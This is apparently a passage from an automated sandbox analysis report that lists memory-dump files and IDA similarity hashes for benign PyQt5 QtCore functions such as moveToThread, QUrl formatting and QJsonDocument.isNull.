                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?moveObject@@Thread@Thread@@@
                                                                                                                                                                                                                • String ID: BJ8$QObject$moveToThread$moveToThread(self, thread: Optional[QThread])
                                                                                                                                                                                                                • API String ID: 2618143792-1479060690
                                                                                                                                                                                                                • Opcode ID: 0ad78de650b5943bdfa0214f569f6ff9b9fff5da8326891a37f6c34dfd3fca80
                                                                                                                                                                                                                • Instruction ID: d95728a10dda5f332fa5dbdfb152182a2624e9c0b6eb14b2978629f24630d6b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ad78de650b5943bdfa0214f569f6ff9b9fff5da8326891a37f6c34dfd3fca80
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4811C8B5A19E46C1DB00DF25E888AA933A5FB48B84FA94032CA5D53320EF7AD559C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?swap@ItemRange@@SelectionV1@@
                                                                                                                                                                                                                • String ID: BJ9$QItemSelectionRange$swap$swap(self, other: QItemSelectionRange)
                                                                                                                                                                                                                • API String ID: 779370736-3241838711
                                                                                                                                                                                                                • Opcode ID: 718d8c104a473e270375dc5145fbe6065f6b1fe2998cddb865cac2cd86207e7b
                                                                                                                                                                                                                • Instruction ID: bd4c9611a11da4616f8881efca2b7b3124b76a1d9a5479fc4032373c6b2462de
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 718d8c104a473e270375dc5145fbe6065f6b1fe2998cddb865cac2cd86207e7b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C1145B6A09F46C1DB00DF25E888AA833B4FB48B90FA50132CA4D13720EF7ED959C344
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?removeEventFilter@Object@@V1@@
                                                                                                                                                                                                                • String ID: BJ8$QObject$removeEventFilter$removeEventFilter(self, a0: Optional[QObject])
                                                                                                                                                                                                                • API String ID: 1348412721-4034304571
                                                                                                                                                                                                                • Opcode ID: a74bb18dd0a2fed7322bbb41e4cb29d8c2851dd108617f19fcff80ca01580d58
                                                                                                                                                                                                                • Instruction ID: 2030a270de8ea2c1647192fe5ab4f0e7d414b746b2235ea9982f2d4b4df43c69
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a74bb18dd0a2fed7322bbb41e4cb29d8c2851dd108617f19fcff80ca01580d58
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE1118B5A19E46C1DB00DF25E888BA833B5FB48B80F994032CA5D13320DF79D959C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FormattingString@@Url@@$ComponentDeallocFlags@FormatFromOption@Option@2@@@@String@Unicode_
                                                                                                                                                                                                                • String ID: PyQt5.QtCore.QUrl(%R)
                                                                                                                                                                                                                • API String ID: 1439388925-1578313138
                                                                                                                                                                                                                • Opcode ID: c2711506561fb9fb14332ac91b04b730051c95f9743cbaccfc5e2e356385a65e
                                                                                                                                                                                                                • Instruction ID: b58b75c3cc3cbfd74e2afc4496f5347c96fe91e8d5e4a4dd9338793575060e04
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c2711506561fb9fb14332ac91b04b730051c95f9743cbaccfc5e2e356385a65e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 340121A5B1AA4281DE449F26E85857973A5BF99BC0F4C1435DD4E13768EF3CE0888704
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?setOutputProcess@Process@@StandardV1@@
                                                                                                                                                                                                                • String ID: BJ8$QProcess$setStandardOutputProcess$setStandardOutputProcess(self, destination: Optional[QProcess])
                                                                                                                                                                                                                • API String ID: 120647969-575066752
                                                                                                                                                                                                                • Opcode ID: c018434ab9bda2ef811c5f3d1c0eb6e85f904a856739913d8bbe3bff67b040a8
                                                                                                                                                                                                                • Instruction ID: ce793b9bfea0c32670b72b36bc4908cb70395ccd9d5f09a0a1e39dcdeb22f0cb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c018434ab9bda2ef811c5f3d1c0eb6e85f904a856739913d8bbe3bff67b040a8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7611E8B6A19F4681DB00DF25E888AA933B5FB48B90FA54132CA5D13320DF79D959C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?convert@Bool_FromLongVariant@@
                                                                                                                                                                                                                • String ID: QVariant$convert$convert(self, targetTypeId: int) -> bool
                                                                                                                                                                                                                • API String ID: 4007575213-3443301841
                                                                                                                                                                                                                • Opcode ID: cba3f58e6e0a5d280002bdb4f86348048ae5146d5023f52cffdb3b6e4ddb1af9
                                                                                                                                                                                                                • Instruction ID: e05f300f2b2b2fe8b074a85510fd4a43fc9404ae034f30f4d631a0b9eaa11bc1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cba3f58e6e0a5d280002bdb4f86348048ae5146d5023f52cffdb3b6e4ddb1af9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA0135B1A19E4681EB00DF24E888AA833A8FB44B40FA50132CA9D13320DF3DD94AC744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ?monthsCalendar@@FromLongLong_Year@
                                                                                                                                                                                                                • String ID: QCalendar$monthsInYear$monthsInYear(self, year: int) -> int
                                                                                                                                                                                                                • API String ID: 343380646-1260604710
                                                                                                                                                                                                                • Opcode ID: 36a3d8ce0a44aea6cdec3166e625b9714fb005f877daf519a2412579d6bed86f
                                                                                                                                                                                                                • Instruction ID: a70e7b1b8346692eeb0131942757060d819b25fff3f7dd19b76ae7b352a44dc1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36a3d8ce0a44aea6cdec3166e625b9714fb005f877daf519a2412579d6bed86f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF011BB5A19F46D2DB00DF24E88CAA933A5FB48B85FA54132CA4D53320EF7DD94AC740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_Dir@@FromLongRelative@
                                                                                                                                                                                                                • String ID: QDir$isAbsolute$isAbsolute(self) -> bool
                                                                                                                                                                                                                • API String ID: 447265013-173768420
                                                                                                                                                                                                                • Opcode ID: 431d035c7c1ab1f614725dcbfab208c4c5057e327ce48f82abb387636e99d66c
                                                                                                                                                                                                                • Instruction ID: f8eefaf9d305594fadb834099cc85ba593c84f0fd42e7e178f4470ad2bea4f4e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 431d035c7c1ab1f614725dcbfab208c4c5057e327ce48f82abb387636e99d66c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9017CB1A09A4681DB00DF75E85CBA933A4FB44B84FA90033CA4D13320DF7DD549C384
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Bool_Document@@Empty@FromJsonLong
                                                                                                                                                                                                                • String ID: QJsonDocument$isNull$isNull(self) -> bool
                                                                                                                                                                                                                • API String ID: 485237231-3663627367
                                                                                                                                                                                                                • Opcode ID: de781f056d1faa51b4911ee527434c7fee36c83242420498ceb3c42013ffb996
                                                                                                                                                                                                                • Instruction ID: 9bd011bd03fc31d6ad553cca248b3a9bb8803efbdec237831cd6989133d33d48
                                                                                                                                                                                                                • Opcode Fuzzy Hash: de781f056d1faa51b4911ee527434c7fee36c83242420498ceb3c42013ffb996
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F50128B5A09B4691DB40DF62E88CBA933A4FB44B94F950032CA9D13320DFBDD55AC384
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
